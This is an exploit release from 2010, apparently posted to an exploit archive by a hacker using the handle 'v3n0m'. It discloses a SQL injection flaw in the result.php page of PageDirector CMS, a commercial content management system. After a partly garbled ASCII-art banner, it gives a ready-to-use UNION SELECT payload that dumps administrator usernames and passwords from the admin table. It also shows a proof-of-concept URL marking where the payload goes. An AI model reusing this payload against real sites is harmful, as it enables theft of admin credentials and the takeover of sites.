pagedirector-sql.txt
Posted on 29 June 2010
) ) ) ( ( ( ( ( ) ) ( /(( /( ( ( /( ( ( ( ) )) ) ) )) ) ) ) ( /( ( /( )())())) ) )()) ) ) ) (()/(()/( ( (()/(()/((()/( )()) )()) ((_)((_)(()/( ((_)((((_)( (((_)(((_)( /(_))(_)) ) /(_))(_))/(_))(_)|((_)\n__ ((_)((_)/(_))___ ((_) _ ) )\___) _ )(_))(_))_ ((_)(_))(_)) (_)) _((_)_ ((_) / / _ (_)) __ / (_)_(_)(/ __(_)_(_) _ | | __| _ | |_ _|| | | |/ / V / (_) || (_ | V / / _ | (__ / _ | /| |) | _|| / |__ | | | .` | ' < |_| \___/ \___| |_| /_/ \_ \___/_/ \_|_|_|___/|___|_|_\____|___||_|\_|_|\_\n.WEB.ID ----------------------------------------------------------------------- PageDirector CMS (result.php) SQL Injection Vulnerability ----------------------------------------------------------------------- Author : v3n0m Site : http://yogyacarderlink.web.id/ Date : June, 29-2010 Location : Jakarta, Indonesia Time Zone : GMT +7:00 ---------------------------------------------------------------- Affected software description: ~~~~~~~~~~~~~~~~~~~~~~~~~~ Application : PageDirector CMS Vendor : http://www.customerparadigm.com/ Price : $675.00 ---------------------------------------------------------------- Exploit: ~~~~~~~ +and+1=2+union+all+select+1,group_concat(username,char(58),password)v3n0m,3,4,5,6,7,8,9,10,11,12+from+admin-- Poc: ~~~~~~~ http://127.0.0.1/[path]/result.php?catid=[xxx]&sub_catid=[SQLi] **[xxx] = valid catid ---------------------------------------------------------------- WWW.YOGYACARDERLINK.WEB.ID | v3n0m666[at]live[dot]com ---------------------------[EOF]--------------------------------